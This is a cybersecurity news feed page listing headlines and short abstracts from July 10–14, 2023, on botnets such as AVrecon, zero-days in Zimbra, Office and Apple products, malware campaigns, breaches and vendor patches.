New AVrecon botnet remained under the radar for two years while targeting SOHO Routers Full Text
Abstract
A new malware dubbed AVrecon targets small office/home office (SOHO) routers, it infected over 70,000 devices from 20 countries. Lumen Black Lotus Labs uncovered a long-running hacking campaign targeting SOHO routers with a strain of malware dubbed AVrecon. The...Security Affairs
July 14, 2023 – Vulnerabilities
Hardcoded Accounts Allow Full Takeover of Technicolor Routers Full Text
Abstract
Multiple hardcoded credentials found on the Technicolor TG670 DSL gateway router allow attackers to completely take over devices, the CERT Coordination Center (CERT/CC) warns.Cyware
July 14, 2023 – Malware
New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries Full Text
Abstract
A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries. Lumen Black Lotus Labs has dubbed the malware AVrecon , making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year. "This makes AVrecon one of the largest SOHO router-targeting botnets ever seen," the company said . "The purpose of the campaign appears to be the creation of a covert network to quietly enable a range of criminal activities from password spraying to digital advertising fraud." A majority of the infections are located in the U.K. and the U.S., followed by Argentina, Nigeria, Brazil, Italy, Bangladesh, Vietnam, India, Russia, and South Africa, among others. AVrecon was first highlighted by Kaspersky senior security researcher Ye (Seth) Jin in May 2021, indicating that the malware hasThe Hacker News
July 14, 2023 – Attack
Norwegian Refugee Council hit by cyberattack Full Text
Abstract
The NRC said it immediately suspended the database to protect the data and prevent further attacks. They also launched an external forensic investigation to determine the scope and impact of the cyberattack.Cyware
July 14, 2023 – Vulnerabilities
Zimbra Warns of Critical Zero-Day Flaw in Email Software Amid Active Exploitation Full Text
Abstract
Zimbra has warned of a critical zero-day security flaw in its email software that has come under active exploitation in the wild. "A security vulnerability in Zimbra Collaboration Suite Version 8.8.15 that could potentially impact the confidentiality and integrity of your data has surfaced," the company said in an advisory. It also said that the issue has been addressed and that it's expected to be delivered in the July patch release. Additional details about the flaw are currently unavailable. In the interim, it is urging customers to apply a manual fix to eliminate the attack vector - Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto Edit this file and go to line number 40 Update the parameter value as: Before the update, the line appeared as: WhiThe Hacker News
July 13, 2023 – Vulnerabilities
Juniper Networks Patches High-Severity Vulnerabilities in Junos OS Full Text
Abstract
The company published 17 advisories detailing roughly a dozen Junos OS-specific security defects, and nearly three times as many issues in third-party components used in its products.Cyware
July 13, 2023 – Malware
PicassoLoader Malware Used in Ongoing Attacks on Ukraine and Poland Full Text
Abstract
Government entities, military organizations, and civilian users in Ukraine and Poland have been targeted as part of a series of campaigns designed to steal sensitive data and gain persistent remote access to the infected systems. The intrusion set, which stretches from April 2022 to July 2023, leverages phishing lures and decoy documents to deploy a downloader malware called PicassoLoader, which acts as a conduit to launch Cobalt Strike Beacon and njRAT. "The attacks used a multistage infection chain initiated with malicious Microsoft Office documents, most commonly using Microsoft Excel and PowerPoint file formats," Cisco Talos researcher Vanja Svajcer said in a new report. "This was followed by an executable downloader and payload concealed in an image file, likely to make its detection more difficult." Some of the activities have been attributed to a threat actor called GhostWriter (aka UAC-0057 or UNC1151), whose priorities are said to align with the BeThe Hacker News
July 13, 2023 – Vulnerabilities
Apple re-released Rapid Security Response to fix recently disclosed zero-day Full Text
Abstract
Apple re-released its Rapid Security Response updates for iOS and macOS after fixing browsing issues on certain websites caused by the first RSR. Apple has re-released its Rapid Security Response updates to address the CVE-2023-37450 flaw in iOS and macOS...Security Affairs
July 13, 2023 – Attack
Tampa Bay Zoo Targeted in Cyberattack by Apparent Offshoot of Royal Ransomware Full Text
Abstract
One of the U.S.’s most popular zoos has been hit with a cyberattack involving the theft of employee and vendor information, and a likely offshoot of the Royal ransomware gang is taking credit.Cyware
July 13, 2023 – Botnet
TeamTNT’s Silentbob Botnet Infecting 196 Hosts in Cloud Attack Campaign Full Text
Abstract
As many as 196 hosts have been infected as part of an aggressive cloud campaign mounted by the TeamTNT group called Silentbob . "The botnet run by TeamTNT has set its sights on Docker and Kubernetes environments, Redis servers, Postgres databases, Hadoop clusters, Tomcat and Nginx servers, Weave Scope, SSH, and Jupyter applications," Aqua security researchers Ofek Itach and Assaf Morag said in a report shared with The Hacker News. "The focus this time seems to be more on infecting systems and testing the botnet, rather than deploying cryptominers for profit." The development arrives a week after the cloud security company detailed an intrusion set linked to the TeamTNT group that targets exposed JupyterLab and Docker APIs to deploy the Tsunami malware and hijack system resources to run a cryptocurrency miner. The latest findings suggest a broader campaign and the use of a larger attack infrastructure than previously thought, including various shell scriptThe Hacker News
July 13, 2023 – Vulnerabilities
Zimbra urges customers to manually fix actively exploited zero-day reported by Google TAG Full Text
Abstract
Zimbra has released updates to address a zero-day vulnerability actively exploited in attacks aimed at Zimbra Collaboration Suite (ZCS) email servers. Zimbra urges customers to manually install updates to fix a zero-day vulnerability that is actively...Security Affairs
July 13, 2023 – Criminals
Criminals Target Businesses With Malicious Extension for Meta’s Ads Manager and Accidentally Leak Stolen Accounts Full Text
Abstract
The Vietnamese threat actors are using malicious Chrome extensions to steal Facebook account credentials, with over 800 victims worldwide and $180K in compromised ad budget.Cyware
July 13, 2023 – Vulnerabilities
Fake PoC for Linux Kernel Vulnerability on GitHub Exposes Researchers to Malware Full Text
Abstract
In a sign that cybersecurity researchers continue to be under the radar of malicious actors, a proof-of-concept (PoC) has been discovered on GitHub, concealing a backdoor with a "crafty" persistence method. "In this instance, the PoC is a wolf in sheep's clothing, harboring malicious intent under the guise of a harmless learning tool," Uptycs researchers Nischay Hegde and Siddartha Malladi said . "Operating as a downloader, it silently dumps and executes a Linux bash script, all the while disguising its operations as a kernel-level process." The repository masquerades as a PoC for CVE-2023-35829 , a recently disclosed high-severity flaw in the Linux kernel. It has since been taken down, but not before it was forked 25 times. Another PoC shared by the same account, ChriSanders22, for CVE-2023-20871 , a privilege escalation bug impacting VMware Fusion, was forked twice. Uptypcs also identified a second GitHub profile containing a bogus PoC fThe Hacker News
July 13, 2023 – Breach
Chinese hackers compromised emails of U.S. Government agencies Full Text
Abstract
Chinese hackers have compromised the emails of an unnamed US Federal Civilian Executive Branch (FCEB) agency. In Mid-June a malicious email activity was reported by an unnamed US Federal Civilian Executive Branch (FCEB) agency. Microsoft experts who investigated...Security Affairs
July 13, 2023 – General
Ransomware Crypto Payments Poised to Set New Record in 2023 Full Text
Abstract
While overall crypto proceeds, including from crimes such as scams, fell dramatically over the past year, ransomware funds are expected to hit $899 million in 2023, according to Chainalysis.Cyware
July 13, 2023 – Vulnerabilities
Rockwell Automation ControlLogix Bugs Expose Industrial Systems to Remote Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has alerted of two security flaws impacting Rockwell Automation ControlLogix EtherNet/IP (ENIP) communication module models that could be exploited to achieve remote code execution and denial-of-service (DoS). "The results and impact of exploiting these vulnerabilities vary depending on the ControlLogix system configuration, but they could lead to denial or loss of control, denial or loss of view, theft of operational data, or manipulation of control for disruptive or destructive consequences on the industrial process for which the ControlLogix system is responsible," Draogos said . The list of flaws is as follows - CVE-2023-3595 (CVSS score: 9.8) - An out-of-bounds write flaw impacting 1756 EN2* and 1756 EN3* products that could result in arbitrary code execution with persistence on the target system through maliciously crafted common industrial protocol ( CIP ) messages. CVE-2023-3596 (CVSS score: 7.5The Hacker News
July 13, 2023 – Vulnerabilities
SonicWall urges organizations to fix critical flaws in GMS/Analytics products Full Text
Abstract
SonicWall fixed multiple critical vulnerabilities impacting its GMS firewall management and Analytics management and reporting engine. SonicWall addressed multiple critical vulnerabilities in its Global Management System (GMS) firewall management...Security Affairs
July 13, 2023 – Vulnerabilities
APT Exploit Targeting Rockwell Automation Flaws Threatens Critical Infrastructure Full Text
Abstract
The 1756 EN2 and 1756 EN3 products are impacted by CVE-2023-3595, a critical flaw that can allow attackers to achieve remote code execution with persistence on targeted systems by using specially crafted Common Industrial Protocol (CIP) messages.Cyware
July 13, 2023 – Breach
U.S. Government Agencies’ Emails Compromised in China-Backed Cyber Attack Full Text
Abstract
An unnamed Federal Civilian Executive Branch (FCEB) agency in the U.S. detected anomalous email activity in mid-June 2023, leading to Microsoft's discovery of a new China-linked espionage campaign targeting two dozen organizations. The details come from a joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) on July 12, 2023. "In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment," the authorities said . "Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data." While the name of the government agency was not revealed, CNN and the Washington Post reported it was the U.S. State Department, citing people familiar with the matter. Also targeted were the Commerce Department as well as the email accouThe Hacker News
July 13, 2023 – Attack
Unpatched Office Zero-Day CVE-2023-36884 Actively Exploited in Targeted Attacks Full Text
Abstract
“An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim," reads the advisory published by Microsoft.Cyware
July 13, 2023 – Vulnerabilities
New Vulnerabilities Disclosed in SonicWall and Fortinet Network Security Products Full Text
Abstract
SonicWall on Wednesday urged customers of Global Management System (GMS) firewall management and Analytics network reporting engine software to apply the latest fixes to secure against a set of 15 security flaws that could be exploited by a threat actor to circumvent authentication and access sensitive information. Of the 15 shortcomings (tracked from CVE-2023-34123 through CVE-2023-34137), four are rated Critical, four are rated High, and seven are rated Medium in severity. The vulnerabilities were disclosed by NCC Group. The flaws impact on-premise versions of GMS 9.3.2-SP1 and before and Analytics 2.5.0.4-R7 and before. Fixes are available in versions GMS 9.3.3 and Analytics 2.5.2. "The suite of vulnerabilities allows an attacker to view data that they are not normally able to retrieve," SonicWall said . "This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or deleThe Hacker News
July 13, 2023 – Encryption
Only 45% of Cloud Data is Currently Encrypted Full Text
Abstract
About 39% of businesses experienced a data breach in their cloud environment last year, an increase from the 35% reported in 2022, according to Thales. Human error was reported as the leading cause of cloud data breaches by 55% of those surveyed.Cyware
July 13, 2023 – Malware
New Attack Drops LokiBot Malware via Malicious Macros in Word Documents Full Text
Abstract
FortiGuard Labs recently uncovered a concerning discovery in their investigation, revealing a series of malicious Microsoft Office documents designed to take advantage of well-known vulnerabilities.Cyware
July 13, 2023 – Policy and Law
Silk Road Drug Market’s ‘Mentor’ Sentenced to 20 Years in Prison Full Text
Abstract
During its operation from 2011 until 2013, Silk Road was used by thousands of drug dealers to distribute narcotics and other illicit goods and services to more than 100,000 buyers and to launder hundreds of millions from those unlawful transactions.Cyware
July 12, 2023 – Policy and Law
British Prosecutors Say Teen Lapsus$ Member Was Behind Hacks on Uber, Rockstar Full Text
Abstract
A British Crown Court on Tuesday lifted a reporting restriction, allowing the naming of teenager Arion Kurtaj who is accused of hacking Uber, Revolut, and video game developer Rockstar Games in a short period of time last September.Cyware
July 12, 2023 – General
Ransomware Extortion Skyrockets in 2023, Reaching $449.1 Million and Counting Full Text
Abstract
Ransomware has emerged as the only cryptocurrency-based crime to grow in 2023, with cybercriminals extorting nearly $175.8 million more than they did a year ago, according to findings from Chainalysis. "Ransomware attackers are on pace for their second-biggest year ever, having extorted at least $449.1 million through June," the blockchain analytics firm said in a midyear crypto crime report shared with The Hacker News. "If this pace continues, ransomware attackers will extort $898.6 million from victims in 2023, trailing only 2021's $939.9 million." In contrast, crypto scams have pulled in 77% less revenue than they did through June of 2022, largely driven by the abrupt exit of VidiLook , which pays users VDL tokens in return for watching digital ads that then can be exchanged for large rewards. So have the inflows to illicit addresses associated with malware, darknet markets, child abuse material, and fraud shops. The development, following a declineThe Hacker News
July 12, 2023 – Vulnerabilities
Citrix fixed a critical flaw in Secure Access Client for Ubuntu Full Text
Abstract
Citrix fixed a critical flaw affecting the Secure Access client for Ubuntu that could be exploited to achieve remote code execution. Citrix addressed a critical vulnerability, tracked as CVE-2023-24492 (CVSS score of 9.6), affecting the Secure Access...Security Affairs
July 12, 2023 – Criminals
Staying ahead of the “professionals”: The service-oriented ransomware crime industry Full Text
Abstract
The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional.Cyware
July 12, 2023 – Education
The Risks and Preventions of AI in Business: Safeguarding Against Potential Pitfalls Full Text
Abstract
Artificial intelligence (AI) holds immense potential for optimizing internal processes within businesses. However, it also comes with legitimate concerns regarding unauthorized use, including data loss risks and legal consequences. In this article, we will explore the risks associated with AI implementation and discuss measures to minimize damages. Additionally, we will examine regulatory initiatives by countries and ethical frameworks adopted by companies to regulate AI. Security risks AI phishing attacks Cybercriminals can leverage AI in various ways to enhance their phishing attacks and increase their chances of success. Here are some ways AI can be exploited for phishing: - Automated Phishing Campaigns: AI-powered tools can automate the creation and dissemination of phishing emails on a large scale. These tools can generate convincing email content, craft personalized messages, and mimic the writing style of a specific individual, making phishing attempts appear more legitThe Hacker News
July 12, 2023 – Criminals
Cl0p hacker operating from Russia-Ukraine war front line – exclusive Full Text
Abstract
CyberNews researchers discovered that at least one of the Cl0p ransomware gang masterminds is still residing in Ukraine. Original post at: https://cybernews.com/security/cl0p-hacker-hides-in-ukraine/ As the Cl0p ransomware gang continues to sow anxiety...Security Affairs
July 12, 2023 – Government
Biden’s Cyber Command and NSA Nominee Seen as a Pick for Continuity Full Text
Abstract
At his first Senate confirmation hearing on Wednesday, Air Force Lt. Gen. Timothy Haugh, Cyber Command’s deputy chief, will explain how he plans to fill the shoes of Paul Nakasone.Cyware
July 12, 2023 – Attack
Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments Full Text
Abstract
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data. The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related individual consumer accounts. The tech giant attributed the campaign to Storm-0558, describing it as a nation-state activity group based out of China that primarily singles out government agencies in Western Europe. "They focus on espionage, data theft, and credential access," Microsoft said . "They are also known to use custom malware that Microsoft tracks as Cigril and Bling, for credential access." The breach is said to have been detected a month later on June 16, 2023, after an unidentified customer reported the anomalous email activity to the company. Microsoft saiThe Hacker News
July 12, 2023 – Vulnerabilities
Fortinet fixed a critical flaw in FortiOS and FortiProxy Full Text
Abstract
Fortinet warns of a critical vulnerability impacting FortiOS and FortiProxy that can allow remote attackers to perform arbitrary code execution. Fortinet has disclosed a critical vulnerability, tracked as CVE-2023-33308 (CVSS score 9.8), that impacts...Security Affairs
July 12, 2023 – Criminals
Cl0p Crime Group Adds 62 Ernst & Young Clients to Leak Sites Full Text
Abstract
The growing list of MOVEit cyberattack victims has grown. Sixty-two clients of Big Four accounting firm Ernst & Young now appear on the Clop ransomware group's data leak sites.Cyware
July 12, 2023 – Hacker
Chinese Hackers Deploy Microsoft-Signed Rootkit to Target Gaming Sector Full Text
Abstract
Cybersecurity researchers have unearthed a novel rootkit signed by Microsoft that's engineered to communicate with an actor-controlled attack infrastructure. Trend Micro has attributed the activity cluster to the same actor that was previously identified as behind the FiveSys rootkit , which came to light in October 2021. "This malicious actor originates from China and their main victims are the gaming sector in China," Trend Micro's Mahmoud Zohdy, Sherif Magdy, and Mohamed Fahmy said . Their malware seems to have passed through the Windows Hardware Quality Labs ( WHQL ) process for getting a valid signature. Multiple variants of the rootkit spanning eight different clusters have been discovered, with 75 such drivers signed using Microsoft's WHQL program in 2022 and 2023. Trend Micro's analysis of some of the samples has revealed the presence of debug messages in the source code, indicating that the operation is still in the development and testing phasThe Hacker News
July 12, 2023 – Attack
Microsoft mitigated an attack by Chinese threat actor Storm-0558 Full Text
Abstract
Microsoft announced it has mitigated a cyber attack by a China-linked threat actor, tracked as Storm-0558, which targeted customer emails. Microsoft announced it has mitigated an attack conducted by a China-linked threat actor, tracked as Storm-0558,...Security Affairs
July 12, 2023 – Vulnerabilities
Fortinet Patches Critical FortiOS Vulnerability Leading to Remote Code Execution Full Text
Abstract
The vulnerability impacts FortiOS and FortiProxy versions 7.2.x and 7.0.x and was resolved in FortiOS versions 7.4.0, 7.2.4, and 7.0.11, and FortiProxy versions 7.2.3 and 7.0.10.Cyware
July 12, 2023 – Denial Of Service
DDoS Attacks Soar by 168% on Government Services, Report Warns Full Text
Abstract
According to StormWall’s Q2 2023 Report, the United States, India, and China remain the most heavily targeted countries, bearing the brunt of the escalating DDoS attacks.Cyware
July 12, 2023 – Vulnerabilities
SAP Patches Critical Vulnerability in ECC and S/4HANA Products Full Text
Abstract
German enterprise software maker SAP on Tuesday announced the release of 16 new security notes as part of its July 2023 Security Patch Day. In addition, updates were announced for two previously released notes.Cyware
July 12, 2023 – Government
Pro-Chinese Twitter Accounts Seek to Expand Beijing’s Influence in Latin America Full Text
Abstract
Three Twitter accounts that appear to have links to the Chinese government have been spreading propaganda in Latin America and successfully avoided Twitter's efforts to label state media, researchers said in an analysis published Tuesday.Cyware
July 12, 2023 – Policy and Law
Two more lawsuits filed against Scranton cardiology group over data breach Full Text
Abstract
Cybercriminals attempted to access accounts of a Scranton couple who are among clients whose personal information was exposed in a data breach at a Commonwealth Health cardiology group's practice, according to a proposed class-action lawsuit.Cyware
July 12, 2023 – Cryptocurrency
Python-Based PyLoose Fileless Attack Targets Cloud Workloads for Cryptocurrency Mining Full Text
Abstract
A new fileless attack dubbed PyLoose has been observed striking cloud workloads with the goal of delivering a cryptocurrency miner, new findings from Wiz reveal. "The attack consists of Python code that loads an XMRig Miner directly into memory using memfd , a known Linux fileless technique," security researchers Avigayil Mechtinger, Oren Ofer, and Itamar Gilad said . "This is the first publicly documented Python-based fileless attack targeting cloud workloads in the wild." The cloud security firm said it found nearly 200 instances where the attack method was employed for cryptocurrency mining. No other details about the threat actor are currently known other than the fact that they possess sophisticated capabilities. In the infection chain documented by Wiz, initial access is achieved through the exploitation of a publicly accessible Jupyter Notebook service that allowed for the execution of system commands using Python modules. PyLoose , first detected onThe Hacker News
July 12, 2023 – Attack
Unpatched Office zero-day CVE-2023-36884 actively exploited in targeted attacks Full Text
Abstract
Microsoft warned today that an unpatched zero-day in multiple Windows and Office products was actively exploited in the wild. Microsoft disclosed an unpatched zero-day vulnerability in multiple Windows and Office products that has been actively exploited...Security Affairs
July 12, 2023 – Vulnerabilities
Update: Apple’s Rapid Security Response Patches Causing Website Access Issues Full Text
Abstract
Apple has pulled its latest Rapid Security Response updates for iOS and macOS after users complained that they were getting errors when accessing some websites through Safari.Cyware
July 12, 2023 – Vulnerabilities
Microsoft Releases Patches for 132 Vulnerabilities, Including 6 Under Active Attack Full Text
Abstract
Microsoft on Tuesday released updates to address a total of 132 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild. Of the 132 vulnerabilities, nine are rated Critical, 122 are rated Important in severity, and one has been assigned a severity rating of "None." This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of last month. The list of issues that have come under active exploitation is as follows - CVE-2023-32046 (CVSS score: 7.8) - Windows MSHTML Platform Elevation of Privilege Vulnerability CVE-2023-32049 (CVSS score: 8.8) - Windows SmartScreen Security Feature Bypass Vulnerability CVE-2023-35311 (CVSS score: 8.8) - Microsoft Outlook Security Feature Bypass Vulnerability CVE-2023-36874 (CVSS score: 7.8) - Windows Error Reporting Service Elevation of Privilege Vulnerability CVE-2023-36884 (CVSS score: 8.3) - Office and WindowsThe Hacker News
July 11, 2023 – Breach
HCA Healthcare data breach impacted 11 million patients Full Text
Abstract
HCA Healthcare disclosed a data breach that exposed the personal information of roughly 11 million patients. HCA Healthcare this week announced that the personal information of roughly 11 million patients was compromised in a data breach. The organization...Security Affairs
July 11, 2023 – Malware
New TOITOIN Trojan Targets LATAM Full Text
Abstract
Businesses in the Latin American region are facing a new threat from a sophisticated malicious campaign distributing the TOITOIN trojan. Moreover, the campaign uses Amazon EC2 instances to evade domain-based detections. It is crucial for organizations to maintain a high level of vigilance against e ... Read MoreCyware
July 11, 2023 – Vulnerabilities
Hackers Exploit Windows Policy Loophole to Forge Kernel-Mode Driver Signatures Full Text
Abstract
A Microsoft Windows policy loophole has been observed being exploited primarily by native Chinese-speaking threat actors to forge signatures on kernel-mode drivers. "Actors are leveraging multiple open-source tools that alter the signing date of kernel mode drivers to load malicious and unverified drivers signed with expired certificates," Cisco Talos said in an exhaustive two-part report shared with The Hacker News. "This is a major threat, as access to the kernel provides complete access to a system, and therefore total compromise." Following responsible disclosure, Microsoft said it has taken steps to block all certificates to mitigate the threat. It further stated that its investigation found "the activity was limited to the abuse of several developer program accounts and that no Microsoft account compromise has been identified." The tech giant, besides suspending developer program accounts involved in the incident, emphasized that the threat aThe Hacker News
July 11, 2023 – Vulnerabilities
Apple issued Rapid Security Response updates to fix a zero-day but pulled them due to a Safari bug Full Text
Abstract
Apple released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address an actively exploited zero-day. Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a...Security Affairs
July 11, 2023 – Malware
Purr-fectly Crafted for Macs: Charming Kitten Introduces NokNok Malware Full Text
Abstract
Security researchers uncovered a new campaign by Charming Kitten (APT42) targeting Windows and macOS systems using different malware payloads. A new type of malware called NokNok, is specifically used for targeting macOS systems. For Windows, adversaries leverage PowerShell code and an LNK file to ... Read MoreCyware
July 11, 2023 – Education
How to Apply MITRE ATT&CK to Your Organization Full Text
Abstract
Discover all the ways MITRE ATT&CK can help you defend your organization. Build your security strategy and policies by making the most of this important framework. What is the MITRE ATT&CK Framework? MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely adopted framework and knowledge base that outlines and categorizes the tactics, techniques, and procedures (TTPs) used in cyberattacks . Created by the nonprofit organization MITRE, this framework provides security professionals with insights and context that can help them comprehend, identify, and mitigate cyber threats effectively. The techniques and tactics in the framework are organized in a dynamic matrix. This makes navigation easy and also provides a holistic view of the entire spectrum of adversary behaviors. As a result, the framework is more actionable and usable than if it were a static list. The MITRE ATT&CK Framework can be found here: https://attack.mitre.org/ Look Out: MIThe Hacker News
July 11, 2023 – Vulnerabilities
VMware warns customers of exploit available for critical vRealize RCE flaw CVE-2023-20864 Full Text
Abstract
VMware warns customers of the public availability of an exploit code for the RCE vulnerability CVE-2023-20864 affecting vRealize. VMware warned customers of the availability of an exploit code for the critical RCE vulnerability CVE-2023-20864 in the VMware...Security Affairs
July 11, 2023 – Vulnerabilities
Owncast, EaseProbe Security Vulnerabilities Revealed Full Text
Abstract
Oxeye has uncovered two critical security vulnerabilities and recommends immediate action to mitigate risk. The vulnerabilities were discovered in Owncast (CVE-2023-3188) and EaseProbe (CVE-2023-33967), two open-source platforms written in Go.Cyware
July 11, 2023 – Cryptocurrency
SCARLETEEL Cryptojacking Campaign Exploiting AWS Fargate in Ongoing Campaign Full Text
Abstract
Cloud environments continue to be at the receiving end of an ongoing advanced attack campaign dubbed SCARLETEEL, with the threat actors now setting their sights on Amazon Web Services (AWS) Fargate. "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture," Sysdig security researcher Alessandro Brucato said in a new report shared with The Hacker News. SCARLETEEL was first exposed by the cybersecurity company in February 2023, detailing a sophisticated attack chain that culminated in the theft of proprietary data from AWS infrastructure and the deployment of cryptocurrency miners to profit off the compromised systems' resources illegally. A follow-up analysis by Cado Security uncovered potential links to a prolific cryptojacking group known as TeamTNT , although Sysdig told The Hacker News that it "could be someThe Hacker News
July 11, 2023 – Criminals
Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud Full Text
Abstract
Resecurity identified the emergence of adversarial mobile Android-based Antidetect Tooling for Mobile OS-Based Fraud. Resecurity has identified the emergence of adversarial mobile Android-based tools (called "mobile anti-detects"), like Enclave and McFly,...Security Affairs
July 11, 2023 – Breach
HCA Healthcare Reports Breach of 11 Million Patients’ Personal Data Full Text
Abstract
In a website notice, HCA confirmed that the data includes “information used for email messages, such as reminders that patients may wish to schedule an appointment and education on healthcare programs and services.”Cyware
July 11, 2023 – Ransomware
Beware of Big Head Ransomware: Spreading Through Fake Windows Updates Full Text
Abstract
A developing piece of ransomware called Big Head is being distributed as part of a malvertising campaign that takes the form of bogus Microsoft Windows updates and Word installers. Big Head was first documented by Fortinet FortiGuard Labs last month, when it discovered multiple variants of the ransomware that are designed to encrypt files on victims' machines in exchange for a cryptocurrency payment. "One Big Head ransomware variant displays a fake Windows Update, potentially indicating that the ransomware was also distributed as a fake Windows Update," Fortinet researchers said at the time. "One of the variants has a Microsoft Word icon and was likely distributed as counterfeit software." A majority of the Big Head samples have been submitted so far from the U.S., Spain, France, and Turkey. In a new analysis of the .NET-based ransomware, Trend Micro detailed its inner workings, calling out its ability to deploy three encrypted binaries: 1.exe to propagThe Hacker News
July 11, 2023 – Malware
Six Malicious Python Packages in the PyPI Targeting Windows Users Full Text
Abstract
The attackers imitated the W4SP attack group by using custom entry points and leveraging free file hosting services to remain undetected during the installation or execution process.Cyware
July 11, 2023 – Vulnerabilities
Apple Issues Urgent Patch for Zero-Day Flaw Targeting iOS, iPadOS, macOS, and Safari Full Text
Abstract
Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a zero-day flaw that it said has been actively exploited in the wild. The WebKit bug, cataloged as CVE-2023-37450 , could allow threat actors to achieve arbitrary code execution when processing specially crafted web content. The iPhone maker said it addressed the issue with improved checks. Credited with discovering and reporting the flaw is an anonymous researcher. As with most cases like this, there are scant details about the nature and the scale of the attacks and the identity of the threat actor behind them. But Apple noted in a terse advisory that it's "aware of a report that this issue may have been actively exploited." The updates, iOS 16.5.1 (a), iPadOS 16.5.1 (a), macOS Ventura 13.4.1 (a), and Safari 16.5.2, are available for devices running the following operating system versions: iOS 16.5.1 and iPadOS 16.5.1 macOS Ventura 13.4.1 macOS BigThe Hacker News
July 11, 2023 – Attack
Australian Infrastructure Company Ventia Hit With Cyberattack Full Text
Abstract
The Australian infrastructure services provider Ventia is dealing with a cyberattack that began this weekend. On Saturday, the company said it identified a cyber intrusion and took some “key systems” offline to contain the incident.Cyware
July 10, 2023 – Phishing
RomCom hackers target NATO Summit attendees in phishing attacks Full Text
Abstract
A threat actor referred to as 'RomCom' has been targeting organizations supporting Ukraine and guests of the upcoming NATO Summit set to start tomorrow in Vilnius, Lithuania.BleepingComputer
July 10, 2023 – Criminals
Genesis Market gang tries to sell platform after FBI disruption Full Text
Abstract
Unlike its competitors, Genesis Market did not just sell stolen data and credentials but also provided a platform to criminals that allowed them to weaponize that data using a custom browser extension to impersonate victims.Cyware
July 10, 2023 – Solution
New Mozilla Feature Blocks Risky Add-Ons on Specific Websites to Safeguard User Security Full Text
Abstract
Mozilla has announced that some add-ons may be blocked from running on certain sites as part of a new feature called Quarantined Domains . "We have introduced a new back-end feature to only allow some extensions monitored by Mozilla to run on specific websites for various reasons, including security concerns," the company said in its Release Notes for Firefox 115.0 released last week. The company said the openness afforded by the add-on ecosystem could be exploited by malicious actors to their advantage. "This feature allows us to prevent attacks by malicious actors targeting specific domains when we have reason to believe there may be malicious add-ons we have not yet discovered," Mozilla said in a separate support document. Users are expected to have more control over the setting for each add-on, starting with Firefox version 116. That said, it can be disabled by loading "about:config" in the address bar and setting "extensions.quarantineThe Hacker News
July 10, 2023 – Vulnerabilities
Experts released PoC exploit for Ubiquiti EdgeRouter flaw Full Text
Abstract
A Proof-of-Concept (PoC) exploit for the CVE-2023-31998 vulnerability in the Ubiquiti EdgeRouter has been publicly released. The CVE-2023-31998 flaw (CVSS v3 5.9) is a heap overflow issue impacting Ubiquiti EdgeRouters and Aircubes, an attacker can exploit...Security Affairs
July 10, 2023 – Malware
VMware warns of exploit available for critical vRealize RCE bug Full Text
Abstract
VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes worth of app and infrastructure logs in large-scale environments.BleepingComputer
July 10, 2023 – Vulnerabilities
PoC Exploit Published for Recent Ubiquiti EdgeRouter Vulnerability Full Text
Abstract
A recently patched vulnerability in Ubiquiti EdgeRouter and AirCube devices could be exploited to execute arbitrary code, vulnerability reporting firm SSD Secure Disclosure warns.Cyware
July 10, 2023 – Malware
New TOITOIN Banking Trojan Targeting Latin American Businesses Full Text
Abstract
Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023. "This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week. "These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks." The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections. The email messages leverage an invoice-themed lure to tThe Hacker News
July 10, 2023 – Attack
RomCom RAT attackers target groups supporting NATO membership of Ukraine Full Text
Abstract
Threat actors are targeting NATO and groups supporting Ukraine in a spear-phishing campaign distributing the RomCom RAT. On July 4, the BlackBerry Threat Research and Intelligence team uncovered a spear phishing campaign aimed at an organization...Security Affairs
July 10, 2023 – Vulnerabilities
Apple releases emergency update to fix zero-day exploited in attacks Full Text
Abstract
Apple has issued a new round of Rapid Security Response (RSR) updates to address a new zero-day bug exploited in attacks and impacting fully-patched iPhones, Macs, and iPads.BleepingComputer
July 10, 2023 – Solution
Honeywell Boosting OT Cybersecurity Offering With Acquisition of SCADAfence Full Text
Abstract
Honeywell has agreed to acquire SCADAfence for an undisclosed amount and plans on integrating its solutions into the company’s Forge Cybersecurity+ suite. The deal is expected to close in the second half of the year.Cyware
July 10, 2023 – General
